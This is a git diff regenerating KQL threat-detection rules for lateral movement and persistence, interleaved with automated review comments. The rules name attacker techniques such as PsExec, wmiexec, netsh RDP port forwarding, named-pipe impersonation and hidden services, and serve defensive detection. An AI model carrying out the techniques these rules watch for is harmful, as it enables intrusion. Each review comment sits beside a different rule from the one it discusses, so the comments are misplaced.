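Review bot: The `// Description:` text ("Detects a remote file copy attempt to a hidden network share") does not describe this query, which matches cmd.exe or powershell.exe running `echo ... > \\.\pipe\...` — a write to a local named pipe, which is the impersonation primitive the title names, not a share copy. Suggested replacement: `// Description: Detects cmd.exe or powershell.exe redirecting echo output into a named pipe ("echo ... > \\.\pipe\..."), a pattern used to make a privileged service connect to an attacker-owned pipe for token impersonation (e.g. Meterpreter getsystem).` The tags (attack.lateral-movement, attack.t1021) follow the same copy-paste; attack.privilege-escalation with T1134.001 (token impersonation) would match what the query actually catches, if the project wants tags to reflect the technique rather than the upstream folder.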
@@ -1,12 +1,12 @@ -// Title: PSEXEC Remote Execution File Artefact -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.privilege-escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: PSEXEC Remote Execution File Artefact +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-21 +// Level: high +// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.privilege-escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql index 889509a6..f4985f03 100644 --- a/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql +++ b/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql 
@@ -1,12 +1,12 @@
-// Title: RDP Port Forwarding Rule Added Via Netsh.EXE
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2019-01-29
-// Level: high
-// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
-// False Positives:
-// - Legitimate administration activity
-
-DeviceProcessEvents
+// Title: RDP Port Forwarding Rule Added Via Netsh.EXE
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2019-01-29
+// Level: high
+// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql b/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql
index d82633f6..14e734c2 100644
--- a/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql
+++ b/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql
@@ -1,12 +1,12 @@
-// Title: Rundll32 Execution Without Parameters
-// Author: Bartlomiej Czyz, Relativity
-// Date: 2021-01-31
-// Level: high
-// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002
-// False Positives:
-// - False positives may occur if a user called rundll32 from CLI with no options
-
-DeviceProcessEvents
+// Title: Rundll32 Execution Without Parameters
+// Author: Bartlomiej Czyz, Relativity
+// Date: 2021-01-31
+// Level: high
+// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002
+// False Positives:
+// - False positives may occur if a user called rundll32 from CLI with no options
+
+DeviceProcessEvents
 | where ProcessCommandLine in~ ("rundll32.exe", "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql b/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql
index 271a9cbf..5bc3c6eb 100644
--- a/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql
+++ b/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Csi.exe Usage
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020-10-17
-// Level: medium
-// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.execution, attack.t1072, attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate usage by software developers
-
-DeviceProcessEvents
+// Title: Suspicious Csi.exe Usage
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-17
+// Level: medium
+// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.execution, attack.t1072, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage by software developers
+
+DeviceProcessEvents
 | where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql b/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql
index 7dc91359..912a0f06 100644
--- a/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql
+++ b/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious RDP Redirect Using TSCON
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-03-17
-// Level: high
-// Description: Detects a suspicious RDP session redirect using tscon.exe
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1563.002, attack.t1021.001, car.2013-07-002
-
-DeviceProcessEvents
+// Title: Suspicious RDP Redirect Using TSCON
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-17
+// Level: high
+// Description: Detects a suspicious RDP session redirect using tscon.exe
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1563.002, attack.t1021.001, car.2013-07-002
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /dest:rdp-tcp#"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql b/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql
index 38e1b84c..f3b5f281 100644
--- a/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql
+++ b/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious SysAidServer Child
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-26
-// Level: medium
-// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1210
-
-DeviceProcessEvents
+// Title: Suspicious SysAidServer Child
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-26
+// Level: medium
+// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1210
+
+DeviceProcessEvents
 | where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql b/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql
index 0fd38a29..fc056b7f 100644
--- a/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql
+++ b/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious UltraVNC Execution
-// Author: Bhabesh Raj
-// Date: 2022-03-04
-// Level: high
-// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.g0047, attack.t1021.005
-
-DeviceProcessEvents
+// Title: Suspicious UltraVNC Execution
+// Author: Bhabesh Raj
+// Date: 2022-03-04
+// Level: high
+// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.g0047, attack.t1021.005
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql
index 642e7576..af97e23b 100644
--- a/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql
+++ b/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql
@@ -1,12 +1,12 @@
-// Title: Windows Admin Share Mount Via Net.EXE
-// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
-// Date: 2020-10-05
-// Level: medium
-// Description: Detects when an admin share is mounted using net.exe
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1021.002
-// False Positives:
-// - Administrators
-
-DeviceProcessEvents
+// Title: Windows Admin Share Mount Via Net.EXE
+// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects when an admin share is mounted using net.exe
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+// False Positives:
+// - Administrators
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
index 1658894f..ee0091cf 100644
--- a/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
+++ b/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
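Review bot: The UNC test in the `| where` clause looks like it lost a backslash in conversion: `ProcessCommandLine contains " \\"` is the KQL literal ` \` (a single backslash), which is already implied by the following `contains "\\"` and matches almost any path argument, whereas the sibling rule windows_share_mount_via_net_exe.kql in this same patch emits `contains " \\\\"` for what is presumably the same ` \\` UNC prefix in the source rule. The condition still fires on genuine admin-share mounts, but it is looser than the upstream logic and the two redundant terms should be reconciled, e.g. `ProcessCommandLine contains " use " and ProcessCommandLine contains " \\\\" and ProcessCommandLine contains "$"`. Since the two files disagree on how the same pattern is escaped, this is worth checking once in the backend rather than rule by rule.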
@@ -1,10 +1,10 @@
-// Title: Windows Internet Hosted WebDav Share Mount Via Net.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-21
-// Level: high
-// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1021.002
-
-DeviceProcessEvents
+// Title: Windows Internet Hosted WebDav Share Mount Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-21
+// Level: high
+// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql
index b32fbc80..1baca70e 100644
--- a/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql
+++ b/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql
@@ -1,12 +1,12 @@
-// Title: Windows Share Mount Via Net.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-02
-// Level: low
-// Description: Detects when a share is mounted using the "net.exe" utility
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1021.002
-// False Positives:
-// - Legitimate activity by administrators and scripts
-
-DeviceProcessEvents
+// Title: Windows Share Mount Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-02
+// Level: low
+// Description: Detects when a share is mounted using the "net.exe" utility
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+// False Positives:
+// - Legitimate activity by administrators and scripts
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql
index 6dad275c..5db95591 100644
--- a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql
+++ b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql
@@ -1,13 +1,13 @@
-// Title: Winrs Local Command Execution
-// Author: Liran Ravich, Nasreddine Bencherchali
-// Date: 2025-10-22
-// Level: high
-// Description: Detects the execution of Winrs.exe where it is used to execute commands locally.
-// Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Winrs Local Command Execution
+// Author: Liran Ravich, Nasreddine Bencherchali
+// Date: 2025-10-22
+// Level: high
+// Description: Detects the execution of Winrs.exe where it is used to execute commands locally.
+// Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (ProcessCommandLine contains "-r:localhost" or ProcessCommandLine contains "/r:localhost" or ProcessCommandLine contains "–r:localhost" or ProcessCommandLine contains "—r:localhost" or ProcessCommandLine contains "―r:localhost" or ProcessCommandLine contains "-r:127.0.0.1" or ProcessCommandLine contains "/r:127.0.0.1" or ProcessCommandLine contains "–r:127.0.0.1" or ProcessCommandLine contains "—r:127.0.0.1" or ProcessCommandLine contains "―r:127.0.0.1" or ProcessCommandLine contains "-r:[::1]" or ProcessCommandLine contains "/r:[::1]" or ProcessCommandLine contains "–r:[::1]" or ProcessCommandLine contains "—r:[::1]" or ProcessCommandLine contains "―r:[::1]" or ProcessCommandLine contains "-remote:localhost" or ProcessCommandLine contains "/remote:localhost" or ProcessCommandLine contains "–remote:localhost" or ProcessCommandLine contains "—remote:localhost" or ProcessCommandLine contains "―remote:localhost" or ProcessCommandLine contains "-remote:127.0.0.1" or ProcessCommandLine contains "/remote:127.0.0.1" or ProcessCommandLine contains "–remote:127.0.0.1" or ProcessCommandLine contains "—remote:127.0.0.1" or ProcessCommandLine contains "―remote:127.0.0.1" or ProcessCommandLine contains "-remote:[::1]" or ProcessCommandLine contains "/remote:[::1]" or ProcessCommandLine contains "–remote:[::1]" or ProcessCommandLine contains "—remote:[::1]" or ProcessCommandLine contains "―remote:[::1]")) or ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (not((ProcessCommandLine contains "-r:" or ProcessCommandLine contains "/r:" or ProcessCommandLine contains "–r:" or ProcessCommandLine contains "—r:" or ProcessCommandLine contains "―r:" or ProcessCommandLine contains "-remote:" or ProcessCommandLine contains "/remote:" or ProcessCommandLine contains "–remote:" or ProcessCommandLine contains "—remote:" or ProcessCommandLine contains "―remote:"))))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql b/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
index 572e0532..de812aaa 100644
--- a/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
+++ b/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
@@ -1,13 +1,13 @@
-// Title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-09-02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.privilege-escalation, attack.persistence, attack.t1546.003
-// False Positives:
-// - Legitimate event consumers
-// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
-
-DeviceImageLoadEvents
+// Title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-09-02
+// Level: medium
+// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.privilege-escalation, attack.persistence, attack.t1546.003
+// False Positives:
+// - Legitimate event consumers
+// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql b/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql
index 03ff0711..f6b6e93b 100644
--- a/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql
+++ b/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql
@@ -1,12 +1,12 @@
-// Title: Wmiexec Default Output File
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-02
-// Level: critical
-// Description: Detects the creation of the default output filename used by the wmiexec tool
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.execution, attack.t1047
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Wmiexec Default Output File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-02
+// Level: critical
+// Description: Detects the creation of the default output filename used by the wmiexec tool
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.execution, attack.t1047
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql b/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql
index 6c6dcc17..c2418e3b 100644
--- a/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql
+++ b/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql
@@ -1,12 +1,12 @@
-// Title: Abuse of Service Permissions to Hide Services Via Set-Service
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
-// False Positives:
-// - Rare intended use of hidden services
-
-DeviceProcessEvents
+// Title: Abuse of Service Permissions to Hide Services Via Set-Service
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: high
+// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+// False Positives:
+// - Rare intended use of hidden services
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql b/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql
index ed568d7c..8d091e01 100644
--- a/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql
+++ b/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql
@@ -1,10 +1,10 @@
-// Title: Activate Suppression of Windows Security Center Notifications
-// Author: frack113
-// Date: 2022-08-19
-// Level: medium
-// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Activate Suppression of Windows Security Center Notifications
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql b/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql
index e3f8d755..fcc2126a 100644
--- a/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql
+++ b/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql
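Review bot: Both halves of the `| where` clause compare against Sysmon-shaped data, so this rule cannot match Defender for Endpoint events. In DeviceRegistryEvents the value name is its own column (`RegistryValueName`) and `RegistryKey` holds only the key path, so `RegistryKey endswith "...\\UX Configuration\\Notification_Suppress"` never matches; likewise DWORD data is surfaced as the decimal string with the type in `RegistryValueType`, not as `DWORD (0x00000001)`. Suggest `RegistryKey endswith "\\Policies\\Microsoft\\Windows Defender\\UX Configuration" and RegistryValueName =~ "Notification_Suppress" and RegistryValueData =~ "1"`. The same field mapping appears in the other registry rules regenerated by this patch, so it is worth fixing in the backend's registry field translation rather than per file.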
@@ -1,12 +1,12 @@
-// Title: Add Debugger Entry To AeDebug For Persistence
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: medium
-// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
-
-DeviceRegistryEvents
+// Title: Add Debugger Entry To AeDebug For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
+
+DeviceRegistryEvents
 | where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql b/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql
index 88024939..0dfded9b 100644
--- a/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql
+++ b/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql
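Review bot: `RegistryKey contains "...\\AeDebug\\Debugger"` folds the value name into the key path, but in DeviceRegistryEvents `RegistryKey` stops at `...\AeDebug` and the value name `Debugger` is reported in `RegistryValueName`, so this condition never matches and the rule is effectively disabled. Suggest `RegistryKey endswith "\\CurrentVersion\\AeDebug" and RegistryValueName =~ "Debugger"`, keeping the `.dll` suffix check on `RegistryValueData` and the vsjitdebugger exclusion as they are. Note for tuning that the exclusion is a case-insensitive exact match on the default Visual Studio string, so a vsjitdebugger install on a different drive would still alert.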
@@ -1,12 +1,12 @@
-// Title: Add Debugger Entry To Hangs Key For Persistence
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - This value is not set by default but could be rarly used by administrators
-
-DeviceRegistryEvents
+// Title: Add Debugger Entry To Hangs Key For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - This value is not set by default but could be rarly used by administrators
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql b/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql
index 8768d399..407fa6ed 100644
--- a/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql
+++ b/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql
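Review bot: The single `| where` condition puts the value name `Debugger` at the end of `RegistryKey`, but DeviceRegistryEvents reports it in `RegistryValueName` with `RegistryKey` ending at `...\Hangs`, so a rule marked `Level: high` will never fire. Suggest `RegistryKey endswith "\\Windows Error Reporting\\Hangs" and RegistryValueName =~ "Debugger"`. Since the header says the value is not set by default, no additional `RegistryValueData` filter is needed to keep the rule high-fidelity.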
@@ -1,10 +1,10 @@
-// Title: Add DisallowRun Execution to Registry
-// Author: frack113
-// Date: 2022-08-19
-// Level: medium
-// Description: Detect set DisallowRun to 1 to prevent user running specific computer program
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Add DisallowRun Execution to Registry
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set DisallowRun to 1 to prevent user running specific computer program
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql b/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql
index 387f4a93..42f5a68d 100644
--- a/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql
+++ b/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql
